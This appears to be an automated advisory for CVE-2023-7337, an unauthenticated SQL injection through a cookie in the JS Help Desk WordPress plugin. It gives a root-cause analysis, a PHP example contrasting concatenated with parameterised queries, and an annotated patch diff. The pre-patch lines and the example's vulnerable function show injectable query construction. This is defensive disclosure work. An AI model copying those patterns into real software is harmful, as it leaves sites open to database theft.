Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2023-7337: JS Help Desk – AI-Powered Support & Ticketing System 2.8.2 – Unauthenticated SQL Injection via ‘js-support-ticket-token-tkstatus’ Cookie (js-support-ticket)

CVE ID: CVE-2023-7337
Severity: High (CVSS 7.5)
CWE: 89
Vulnerable Version: 2.8.2
Patched Version: 2.8.3
Disclosed: March 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2023-7337:
The vulnerability is an unauthenticated SQL injection in version 2.8.2 of the JS Help Desk WordPress plugin. The root cause is insufficient sanitization of the ‘js-support-ticket-token-tkstatus’ cookie value before it is used in SQL queries. The plugin’s session handling reads this cookie into the jssupportticket::$_jshdsession->sessionid variable, and the getNotificationDatabySessionId function in wphdnotification.php (line 81) concatenates that value directly into a query without escaping. Because the cookie is entirely under the client’s control and the code path requires no authentication, attackers can manipulate it to inject malicious SQL payloads.

The patch adds esc_sql() sanitization to the sessionid parameter in the query at line 81 of wphdnotification.php, so the value is escaped before the query is executed.

Impact: an unauthenticated attacker can execute arbitrary SQL commands, potentially extracting sensitive data such as user credentials, ticket contents, and system configuration. The CVSS score of 7.5 reflects high impact with no authentication required.
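The following is an added example, not code from the JS Help Desk plugin or from Atomic Edge. It contrasts the vulnerable shape described above (a cookie-derived session id concatenated into SQL) with a hardened form that validates the token format and binds values through a prepare()-style call. The FakeWpdb class is a stand-in for WordPress’s global $wpdb so the file runs outside WordPress; the token format in the regular expression and the function names are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code). FakeWpdb imitates just enough of
// WordPress's $wpdb to run stand-alone; in a real plugin use the global $wpdb.
class FakeWpdb {
    public $prefix = 'wp_';
    public $last_query = '';

    // Minimal imitation of wpdb::prepare(): %d becomes an integer, %s a quoted,
    // escaped string. addslashes() is a stand-in for the driver's real escaping.
    public function prepare(string $sql, ...$args): string {
        $i = 0;
        return preg_replace_callback('/%[ds]/', function ($m) use (&$i, $args) {
            $value = $args[$i++];
            if ($m[0] === '%d') {
                return (string) (int) $value;
            }
            return "'" . addslashes((string) $value) . "'";
        }, $sql);
    }

    // A real wpdb would execute here; the stub only records the SQL it was given.
    public function get_var(string $sql) {
        $this->last_query = $sql;
        return null;
    }
}

// Vulnerable shape: the session id comes straight from a request cookie and is
// concatenated into the SQL string with no escaping or type check.
function notification_query_vulnerable(FakeWpdb $db, string $sessionid, string $sessionfor): string {
    $query = "SELECT sessionmsg FROM `" . $db->prefix . "js_ticket_jshdsessiondata`"
           . " WHERE usersessionid = '" . $sessionid . "'"
           . " AND sessionfor = '" . $sessionfor . "'"
           . " AND sessionexpire > '" . time() . "'";
    $db->get_var($query);
    return $db->last_query;
}

// Hardened shape: reject session ids that do not match the expected token
// alphabet before they reach the database, then bind every value with
// prepare() so quoting is handled by the database layer, not by concatenation.
function notification_query_hardened(FakeWpdb $db, string $sessionid, string $sessionfor): ?string {
    // Assumed token format (32 to 64 hex characters); adjust to whatever the
    // application actually issues when it creates a session.
    if (!preg_match('/^[A-Fa-f0-9]{32,64}$/', $sessionid)) {
        return null; // treat as "no session" rather than building any SQL
    }
    $query = $db->prepare(
        "SELECT sessionmsg FROM `{$db->prefix}js_ticket_jshdsessiondata`"
        . " WHERE usersessionid = %s AND sessionfor = %s AND sessionexpire > %d",
        $sessionid, $sessionfor, time()
    );
    $db->get_var($query);
    return $db->last_query;
}

// Constructed demonstration input: a cookie value that carries a quote character.
$db = new FakeWpdb();
$cookie = "not-a-token'x";

// The quote lands unescaped inside the SQL string.
echo notification_query_vulnerable($db, $cookie, 'notification'), PHP_EOL;

// Rejected by the format check, so no SQL is built for this value.
var_dump(notification_query_hardened($db, $cookie, 'notification'));

// A well-formed token is bound through prepare() and reaches the query quoted.
echo notification_query_hardened($db, str_repeat('a', 32), 'notification'), PHP_EOL;
```

The format check is the cheap first line of defence: a session token has a known shape, so anything that does not match it can be treated as "no session" before a query is ever assembled. The prepare() call is what actually removes the injection, and it does so regardless of whether a given call site remembered to quote the placeholder.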

Differential between vulnerable and patched code

Code Diff
--- a/js-support-ticket/includes/activation.php
+++ b/js-support-ticket/includes/activation.php
@@ -97,9 +97,9 @@
                     ('new_ticket_mail_to_admin', '1', 'default', ''),
                     ('new_ticket_mail_to_staff_members', '0', 'default', 'agent'),
                     ('banemail_mail_to_admin', '0', 'default', 'banemail'),
-                    ('ticket_reassign_admin', '1', 'default', NULL),
+                    ('ticket_reassign_admin', '1', 'default', 'agent'),
                     ('ticket_reassign_staff', '0', 'default', 'agent'),
-                    ('ticket_reassign_user', '1', 'default', NULL),
+                    ('ticket_reassign_user', '1', 'default', 'agent'),
                     ('ticket_close_admin', '1', 'default', NULL),
                     ('ticket_close_staff', '0', 'default', 'agent'),
                     ('ticket_close_user', '1', 'default', NULL),
@@ -112,9 +112,9 @@
                     ('ticket_ban_email_admin', '0', 'default', 'banemail'),
                     ('ticket_ban_email_staff', '0', 'default', 'banemail'),
                     ('ticket_ban_email_user', '0', 'default', 'banemail'),
-                    ('ticket_department_transfer_admin', '1', 'default', NULL),
-                    ('ticket_department_transfer_staff', '0', 'default', 'agent'),
-                    ('ticket_department_transfer_user', '1', 'default', NULL),
+                    ('ticket_department_transfer_admin', '1', 'default', 'actions'),
+                    ('ticket_department_transfer_staff', '0', 'default', 'actions'),
+                    ('ticket_department_transfer_user', '1', 'default', 'actions'),
                     ('ticket_reply_ticket_user_admin', '1', 'default', NULL),
                     ('ticket_reply_ticket_user_staff', '0', 'default', 'agent'),
                     ('ticket_reply_ticket_user_user', '1', 'default', NULL),
@@ -194,8 +194,8 @@
                     ('tplink_faqs_user', '0', 'tplink', 'faq'),
                     ('show_breadcrumbs', '1', 'default', NULL),
                     ('productcode', 'jsticket', 'default', NULL),
-                    ('versioncode', '2.8.2', 'default', NULL),
-                    ('productversion', '282', 'default', NULL),
+                    ('versioncode', '2.8.3', 'default', NULL),
+                    ('productversion', '283', 'default', NULL),
                     ('producttype', 'free', 'default', NULL),
                     ('tve_enabled', '2', 'default', NULL),
                     ('tve_mailreadtype', '3', 'default', NULL),
@@ -225,7 +225,7 @@
                     ('prefix_ticketid', '', 'customticketid', NULL),
                     ('suffix_ticketid', '', 'customticketid', NULL),
                     ('padding_zeros_ticketid', '', 'customticketid', NULL),
-                    ('print_ticket_user', '1', 'ticket', NULL),
+                    ('print_ticket_user', '1', 'ticket', 'actions'),
                     ('last_version', '211', 'default', NULL),
                     ('cplink_staff_report_staff', '2', 'cplink', 'agent'),
                     ('cplink_department_report_staff', '2', 'cplink', 'agent'),
@@ -242,7 +242,7 @@
                     ('show_email_on_ticket_reply', '1', 'ticket', NULL),
                     ('show_ticket_delete_button', '1', 'ticket', NULL),
                     ('visitor_message', 'Thank You for contacting us. A support ticket request has been created, A representative will be getting back to you shortly.rnSupport Team', 'default', NULL),
-                    ('ticket_reply_closed_ticket_user', '1', 'default', NULL),
+                    ('ticket_reply_closed_ticket_user', '1', 'default', 'emailpiping'),
                     ('feedback_thanks_message', 'Thank you for providing your feedback. We appreciate the time you have taken and will actively use it to improve our services to you.', 'default', 'feedback'),
                     ('serialnumber', '67259', 'hostdata', NULL),
                     ('hostdata', '88fd93f82e5ca231ff4e85e769be370f', 'hostdata', NULL),
--- a/js-support-ticket/includes/classes/customfields.php
+++ b/js-support-ticket/includes/classes/customfields.php
@@ -506,7 +506,7 @@
         if (!is_admin()) {
             $inquery .= ' AND userfieldtype != "admin_only" ';
         }
-        $query = "SELECT field,fieldtitle,isuserfield,userfieldtype,userfieldparams,multiformid  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND fieldfor =" . $fieldfor . $inquery. " AND multiformid =" . $multiformid. " ORDER BY ordering";
+        $query = "SELECT field,fieldtitle,isuserfield,userfieldtype,userfieldparams,multiformid  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND fieldfor =" . esc_sql($fieldfor) . $inquery. " AND multiformid =" . esc_sql($multiformid). " ORDER BY ordering";
         $data = jssupportticket::$_db->get_results($query);
         return $data;
     }
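Review bot: esc_sql() on `$fieldfor` and `$multiformid` in the `+` line does not constrain values that are interpolated without surrounding quotes (`fieldfor =" . esc_sql($fieldfor)` and `multiformid =" . esc_sql($multiformid)`); esc_sql() only escapes quote and backslash characters, so a value containing neither reaches the bare numeric comparison unchanged. Cast with `(int)` or build the statement with `$wpdb->prepare()` and `%d` placeholders. The same unquoted pattern recurs in the uploads.php, user.php, attachment/model.php and department/model.php hunks below.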
@@ -521,7 +521,7 @@
             $inquery .= " AND userfieldtype != 'admin_only'";
         }

-        $query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $inquery . " AND fieldfor =" . $fieldfor ." ORDER BY ordering ";
+        $query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $inquery . " AND fieldfor =" . esc_sql($fieldfor) ." ORDER BY ordering ";
         $data = jssupportticket::$_db->get_results($query);
         return $data;
     }
@@ -534,7 +534,7 @@
         }
         $value = '';
         $returnarray = array();
-        $query = "SELECT field from " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND depandant_field ='" . $fieldfor . "'";
+        $query = "SELECT field from " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND depandant_field ='" . esc_sql($fieldfor) . "'";
         $field = jssupportticket::$_db->get_var($query);
         if ($data != null) {
             foreach ($data as $key => $val) {
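Review bot: `$published` is still concatenated unescaped into the WHERE clause on both the `-` and `+` lines (`" AND " . $published . " AND depandant_field ='"`), while this hunk applies esc_sql() only to `$fieldfor`. If `$published` is assembled from literal SQL fragments that is fine, but it should be confirmed at the call site, since the query is otherwise fully escaped now.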
@@ -544,7 +544,7 @@
                 }
             }
         }
-        $query = "SELECT userfieldparams from " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND field ='" . $fieldfor . "'";
+        $query = "SELECT userfieldparams from " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND field ='" . esc_sql($fieldfor) . "'";
         $field = jssupportticket::$_db->get_var($query);
         $fieldarray = json_decode($field);
         foreach ($fieldarray as $key => $val) {
--- a/js-support-ticket/includes/classes/jsstadminsidemenu.php
+++ b/js-support-ticket/includes/classes/jsstadminsidemenu.php
@@ -312,7 +312,7 @@
             <span class="jsst_text"><?php echo esc_html(__('GDPR','js-support-ticket')); ?></span>
         </a>
         <ul class="jsstadmin-sidebar-submenu treeview-menu">
-            <li class="<?php if($c == 'gdpr' && ($layout == 'gdprfields') || ($layout == 'addgdprfield')) echo 'active'; ?>">
+            <li style="display: none;" class="<?php if($c == 'gdpr' && ($layout == 'gdprfields') || ($layout == 'addgdprfield')) echo 'active'; ?>">
                 <a href="?page=gdpr&jstlay=gdprfields" title="<?php echo esc_html(__('GDPR Fields','js-support-ticket')); ?>">
                     <?php echo esc_html(__('GDPR Fields','js-support-ticket')); ?>
                 </a>
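Review bot: adding `style="display: none;"` to the GDPR Fields `<li>` is presentation only; the `?page=gdpr&jstlay=gdprfields` route it links to is unchanged by this hunk, so if the intent is to retire the feature, the handler for that layout should enforce it server-side rather than relying on a hidden link. Separately, the unchanged condition `$c == 'gdpr' && ($layout == 'gdprfields') || ($layout == 'addgdprfield')` binds `&&` before `||`, so 'active' is set for `addgdprfield` regardless of `$c`; parenthesise it as `$c == 'gdpr' && ($layout == 'gdprfields' || $layout == 'addgdprfield')`.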
--- a/js-support-ticket/includes/classes/uploads.php
+++ b/js-support-ticket/includes/classes/uploads.php
@@ -22,7 +22,7 @@

             if($this->uploadfor == 'ticket'){
                 $path = $path . '/ticket';
-                $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".$this->ticketid;
+                $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".esc_sql($this->ticketid);
                 $foldername = jssupportticket::$_db->get_var($query);
             }elseif($this->uploadfor == 'article'){
                 $path = $path . '/articles/article_'.$this->articleid;
@@ -131,7 +131,7 @@
         if (!file_exists($path)) { // create user directory
             JSSTincluder::getJSModel('jssupportticket')->makeDir($path);
         }
-        $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".$idsarray[0];
+        $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".esc_sql($idsarray[0]);
         $foldername = jssupportticket::$_db->get_var($query);

         $path = $path . '/' . $foldername;
--- a/js-support-ticket/includes/classes/user.php
+++ b/js-support-ticket/includes/classes/user.php
@@ -15,7 +15,7 @@
             $wpuserid = get_current_user_id();
             if (!is_numeric($wpuserid))
                 return false;
-            $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . $wpuserid;
+            $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($wpuserid);
             $currentuser = jssupportticket::$_db->get_row($query);
             $jssupportticket_registerform = JSSTrequest::getVar('jsst_support_register_nonce', 'post', '');
             $registerform = JSSTrequest::getVar('jssupportticket_registerform', 'post', 0);
@@ -61,7 +61,7 @@
                 $row->store();

                 if (is_numeric($row->id)) {
-                    $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . $row->id;
+                    $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . esc_sql($row->id);
                     $currentuser = jssupportticket::$_db->get_results($query);
                 }
             }
@@ -148,7 +148,7 @@
             $wpuserid = JSSTincluder::getObjectClass('user')->uid();
             if (!is_numeric($wpuserid))
                 return false;
-            $query = "SELECT COUNT(id) FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . $wpuserid;
+            $query = "SELECT COUNT(id) FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($wpuserid);
             $result = jssupportticket::$_db->get_results($query);
             if ($result > 0) {
                 return true;
@@ -180,7 +180,7 @@
     function getjssupportticketuidbyuserid($userid)
     {
         if (!is_numeric($userid)) return false;
-        $query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . $userid;
+        $query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($userid);
         $uid = jssupportticket::$_db->get_results($query);
         return $uid;
     }
@@ -193,7 +193,7 @@
         if(! is_numeric($uid))
             return false;
         $model = JSSTincluder::getJSModel('ticket');
-        $query = "SELECT id , ticketid FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE wpuid = ".$uid;
+        $query = "SELECT id , ticketid FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE wpuid = ".esc_sql($uid);
         $tickets = jssupportticket::$_db->get_results($query);

         do_action('jsst_addon_deletequery_for_user');
@@ -206,10 +206,10 @@
             LEFT JOIN `". jssupportticket::$_db->prefix ."js_ticket_erasedatarequests` AS erasedatarequests ON erasedatarequests.uid = user.id
             "
             . jssupportticket::$_addon_query['join'] . "
-            WHERE user.id = " . $uid;
+            WHERE user.id = " . esc_sql($uid);
         jssupportticket::$_db->query($query);
         do_action('reset_jsst_aadon_query');
-        $query = "DELETE user FROM `".jssupportticket::$_db->prefix."js_ticket_users` AS user WHERE wpuid = " . $uid;
+        $query = "DELETE user FROM `".jssupportticket::$_db->prefix."js_ticket_users` AS user WHERE wpuid = " . esc_sql($uid);
         if(jssupportticket::$_db->query($query)){
             $maindir = wp_upload_dir();
             $basedir = $maindir['basedir'];
@@ -236,10 +236,19 @@
         if (!is_numeric($wpuid))
             return false;

-        $query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . $wpuid;
+        $query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($wpuid);
         $result = jssupportticket::$_db->get_var($query);
         return $result;
     }

+    function getUserNameByUid($uid) {
+        if (!is_numeric($uid))
+            return false;
+
+        $query = "SELECT display_name,user_nicename FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . $uid;
+        $result = jssupportticket::$_db->get_row($query);
+        return $result;
+    }
+
 }
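Review bot: the new `getUserNameByUid()` concatenates `$uid` into `WHERE id = " . $uid` without esc_sql(), which is inconsistent with every other query this patch touches. The `is_numeric()` guard above it does bound the value, but for an id column the explicit form is `(int) $uid` or `prepare('... WHERE id = %d', $uid)`; that also documents the intent for the next reader who sees the rest of the file using esc_sql().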

--- a/js-support-ticket/includes/classes/wphdnotification.php
+++ b/js-support-ticket/includes/classes/wphdnotification.php
@@ -81,7 +81,7 @@
     public function getNotificationDatabySessionId($sessionfor , $deldata = false){
         if(jssupportticket::$_jshdsession->sessionid == '')
             return false;
-        $query = "SELECT sessionmsg FROM `" . jssupportticket::$_db->prefix . "js_ticket_jshdsessiondata` WHERE usersessionid = '" . jssupportticket::$_jshdsession->sessionid . "' AND sessionfor = '" . $sessionfor . "' AND sessionexpire > '" . time() . "'";
+        $query = "SELECT sessionmsg FROM `" . jssupportticket::$_db->prefix . "js_ticket_jshdsessiondata` WHERE usersessionid = '" . esc_sql(jssupportticket::$_jshdsession->sessionid) . "' AND sessionfor = '" . esc_sql($sessionfor) . "' AND sessionexpire > '" . time() . "'";
         $data = jssupportticket::$_db->get_var($query);
         if(!empty($data)){
             $data = jssupportticketphplib::JSST_safe_decoding($data);
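Review bot: this is the hunk that addresses the advisory's root cause, and because both `jssupportticket::$_jshdsession->sessionid` and `$sessionfor` sit inside single quotes in the SQL, esc_sql() is adequate here; `time()` is generated server-side. Two follow-ups: the fix depends on the quoting discipline of each call site, so `$wpdb->prepare()` with `%s`/`%d` placeholders would be the more robust form, and since `sessionid` is populated from a request cookie, validating it against the token format the plugin issues at the point where the cookie is first read (treating anything else as no session, as the `== ''` guard above already does for the empty case) would stop malformed values before they reach any query.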
--- a/js-support-ticket/includes/deactivation.php
+++ b/js-support-ticket/includes/deactivation.php
@@ -11,7 +11,7 @@
       $timestamp = wp_next_scheduled( 'jsst_delete_expire_session_data' );
       wp_unschedule_event( $timestamp, 'jsst_delete_expire_session_data' );
       $id = jssupportticket::getPageid();
-      jssupportticket::$_db->get_var("UPDATE `" . jssupportticket::$_db->prefix . "posts` SET post_status = 'draft' WHERE ID = $id");
+      jssupportticket::$_db->get_var("UPDATE `" . jssupportticket::$_db->prefix . "posts` SET post_status = 'draft' WHERE ID = ".esc_sql($id));

       //Delete capabilities
       $role = get_role( 'administrator' );
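Review bot: `get_var()` is used to run an UPDATE on both the `-` and `+` lines; `get_var()` is meant for reading a single column value, so the statement should go through `jssupportticket::$_db->query()`. Also `$id` is interpolated without quotes, where esc_sql() does not bound the value; `getPageid()` presumably returns a post ID, so `(int) $id` or `prepare('... WHERE ID = %d', $id)` states that explicitly.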
--- a/js-support-ticket/includes/jsst-hooks.php
+++ b/js-support-ticket/includes/jsst-hooks.php
@@ -262,7 +262,7 @@
 function jsst_update_user_profile($user_id)
 {

-    $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "users` WHERE id = " . $user_id;
+    $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "users` WHERE id = " . esc_sql($user_id);
     $user = jssupportticket::$_db->get_row($query);

     $uid = "";
@@ -274,7 +274,7 @@

 	if(isset($_POST['user_id'])) $post_user_id = jssupportticket::JSST_sanitizeData($_POST['user_id']); // JSST_sanitizeData() function uses wordpress santize functions
     if ($post_user_id == $user_id) {
-        $query = "SELECT id FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` WHERE wpuid = " . $user_id;
+        $query = "SELECT id FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` WHERE wpuid = " . esc_sql($user_id);
         $id = jssupportticket::$_db->get_var($query);
     }
 	$name = "";
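Review bot: `$post_user_id` is assigned only inside `if(isset($_POST['user_id']))`, yet the following line compares it unconditionally (`if ($post_user_id == $user_id)`), which raises an undefined-variable notice whenever the field is absent; initialise `$post_user_id = 0;` before the isset check and compare the two as integers with `===`. The `+` line's `esc_sql($user_id)` sits in an unquoted comparison; `(int) $user_id` is the tighter form for a user ID.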
--- a/js-support-ticket/includes/permissions.php
+++ b/js-support-ticket/includes/permissions.php
@@ -9,7 +9,7 @@
         $query = "SELECT perm_allowed.status
 					FROM `" . jsjobs::$_db->prefix . "jsjobs_permissions` AS perm
 					JOIN `" . jsjobs::$_db->prefix . "jsjobs_permissions_allowed` AS perm_allowed ON perm_allowed.permissionid = perm.id
-					WHERE perm.permissions = '$permissionfor' AND perm_allowed.userid = $userid";
+					WHERE perm.permissions = '".esc_sql($permissionfor)."' AND perm_allowed.userid = ".esc_sql($userid);
         $result = jsjobs::$_db->get_var($query);
         return $result;
     }
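Review bot: this hunk builds the query from `jsjobs::$_db` and the `jsjobs_permissions` / `jsjobs_permissions_allowed` tables, while every other file in this patch uses `jssupportticket::$_db` and `js_ticket_*` tables. If this file was carried over from another plugin, confirm that the `jsjobs` class exists here and that the function is reachable at all; dead code is better removed than patched. Within the hunk, `$permissionfor` is now quoted and escaped, but `$userid` remains an unquoted numeric comparison where esc_sql() alone does not constrain it.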
--- a/js-support-ticket/includes/tables/table.php
+++ b/js-support-ticket/includes/tables/table.php
@@ -111,7 +111,7 @@

     function load($id){
         if(!is_numeric($id)) return false;
-        $query = "SELECT * FROM `".$this->tablename."` WHERE ".$this->primarykey." = ".$id;
+        $query = "SELECT * FROM `".$this->tablename."` WHERE ".$this->primarykey." = ".esc_sql($id);
         $result = jssupportticket::$_db->get_row($query);
         $array = get_object_vars($this);
         unset($array['isnew']);
@@ -129,4 +129,4 @@

 }

-?>
 No newline at end of file
+?>
--- a/js-support-ticket/includes/updates/updates.php
+++ b/js-support-ticket/includes/updates/updates.php
@@ -19,7 +19,7 @@
 			$query = "SELECT configvalue FROM `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname='versioncode'";
 			$versioncode = jssupportticket::$_db->get_var($query);
 			$versioncode = jssupportticketphplib::JSST_str_replace('.','',$versioncode);
-			$query = "UPDATE `".jssupportticket::$_db->prefix."js_ticket_config` SET configvalue = '".$versioncode."' WHERE configname = 'last_version';";
+			$query = "UPDATE `".jssupportticket::$_db->prefix."js_ticket_config` SET configvalue = '".esc_sql($versioncode)."' WHERE configname = 'last_version';";
 			jssupportticket::$_db->query($query);
             $from = $installedversion + 1;
             $to = $cversion;
--- a/js-support-ticket/js-support-ticket.php
+++ b/js-support-ticket/js-support-ticket.php
@@ -3,14 +3,14 @@
 /**
  * @package JS Help Desk
  * @author Ahmad Bilal
- * @version 2.8.2
+ * @version 2.8.3
  */
 /*
   Plugin Name: JS Help Desk
   Plugin URI: https://www.jshelpdesk.com
   Description: JS Help Desk is a trusted open source ticket system. JS Help Desk is a simple, easy to use, web-based customer support system. User can create ticket from front-end. JS Help Desk comes packed with lot features than most of the expensive(and complex) support ticket system on market. JS Help Desk provide you best industry help desk system.
   Author: JS Help Desk
-  Version: 2.8.2
+  Version: 2.8.3
   Text Domain: js-support-ticket
   Author URI: https://www.jshelpdesk.com
  */
@@ -66,7 +66,7 @@
         self::$_data = array();
         self::$_search = array();
         self::$_captcha = array();
-        self::$_currentversion = '282';
+        self::$_currentversion = '283';
         self::$_addon_query = array('select'=>'','join'=>'','where'=>'');
         self::$_jshdsession = JSSTincluder::getObjectClass('wphdsession');
         global $wpdb;
@@ -144,7 +144,7 @@
                     // restore colors data end
                     update_option('jsst_currentversion', self::$_currentversion);
                     include_once JSST_PLUGIN_PATH . 'includes/updates/updates.php';
-                    JSSTupdates::checkUpdates('282');
+                    JSSTupdates::checkUpdates('283');
                     JSSTincluder::getJSModel('jssupportticket')->updateColorFile();
                 }
             }
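Review bot: `JSSTupdates::checkUpdates('283')` on the `+` line hardcodes the version string that `self::$_currentversion` already holds (see `update_option('jsst_currentversion', self::$_currentversion)` two lines above); passing `self::$_currentversion` would remove one of the three places this patch had to bump `282` to `283` and keep them from drifting apart in a future release.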
--- a/js-support-ticket/modules/attachment/model.php
+++ b/js-support-ticket/modules/attachment/model.php
@@ -10,7 +10,7 @@
             return false;
         $query = "SELECT filename,filesize,id
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_attachments`
-                    WHERE ticketid = " . $id . " and replyattachmentid = 0";
+                    WHERE ticketid = " . esc_sql($id) . " and replyattachmentid = 0";
         jssupportticket::$_data[5] = jssupportticket::$_db->get_results($query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -25,7 +25,7 @@
             return false;
         $query = "SELECT filename,filesize,id
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_attachments`
-                    WHERE ticketid = " . $id . " AND replyattachmentid = " . $replyattachmentid;
+                    WHERE ticketid = " . esc_sql($id) . " AND replyattachmentid = " . esc_sql($replyattachmentid);
         $result = jssupportticket::$_db->get_results($query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -74,7 +74,7 @@
         $query = $query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = $id";
+                . " WHERE attach.id = ". esc_sql($id);
         $obj = jssupportticket::$_db->get_row($query);
         $filename = $obj->filename;
         $foldername = $obj->foldername;
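Review bot: the first context line of this hunk reads `$query = $query = "SELECT ...`, a doubled assignment that is harmless but clearly a typo; since the statement is being edited anyway, drop the duplicate. The `+` line applies esc_sql() to `$id` in the unquoted `attach.id = ` comparison, the same pattern flagged for customfields.php; `(int) $id` or a `%d` placeholder is the precise fix for an id column, and the same applies to the two identical hunks that follow in this file.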
@@ -103,7 +103,7 @@
         $query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = $id";
+                . " WHERE attach.id = ". esc_sql($id);
         $object = jssupportticket::$_db->get_row($query);
         $datadirectory = jssupportticket::$_config['data_directory'];
         $foldername = $object->foldername;
@@ -124,7 +124,7 @@
         $query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = $id";
+                . " WHERE attach.id = ". esc_sql($id);
         $object = jssupportticket::$_db->get_row($query);
         $foldername = $object->foldername;
         $ticketid = $object->ticketid;
@@ -176,7 +176,7 @@
         if(empty($file_name)) return false;
         if(!is_numeric($id)) return false;
         $filename = jssupportticketphplib::JSST_str_replace(' ', '_',$file_name);
-        $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".$id;
+        $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".esc_sql($id);
         $foldername = jssupportticket::$_db->get_var($query);

         $datadirectory = jssupportticket::$_config['data_directory'];
--- a/js-support-ticket/modules/configuration/model.php
+++ b/js-support-ticket/modules/configuration/model.php
@@ -28,7 +28,7 @@

     function getConfigurationByFor($for) {
 		if($for == 'ticketviaemail'){
-			$query = "SELECT COUNT(configname) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".$for."'";
+			$query = "SELECT COUNT(configname) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".esc_sql($for)."'";
 			$count = jssupportticket::$_db->get_var($query);
 			if($count < 5){
 				$query = "SELECT configname,configvalue
@@ -47,7 +47,7 @@
 			}
 		}
         $query = "SELECT configname,configvalue
-					FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".$for."'";
+					FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".esc_sql($for)."'";
         $data = jssupportticket::$_db->get_results($query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -63,10 +63,10 @@
     function getCountByConfigFor($for) {
         if (( in_array('agent',jssupportticket::$_active_addons) && JSSTincluder::getJSModel('agent')->isUserStaff())) {
             $query = "SELECT COUNT(configvalue)
-                    FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".$for. "' AND configname LIKE '%staff' AND configvalue = 1 " ;
+                    FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".esc_sql($for). "' AND configname LIKE '%staff' AND configvalue = 1 " ;
         }else{
             $query = "SELECT COUNT(configvalue)
-                    FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".$for. "' AND configname LIKE '%user' AND configvalue = 1 " ;
+                    FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".esc_sql($for) . "' AND configname LIKE '%user' AND configvalue = 1 " ;
         }
         $data = jssupportticket::$_db->get_var($query);
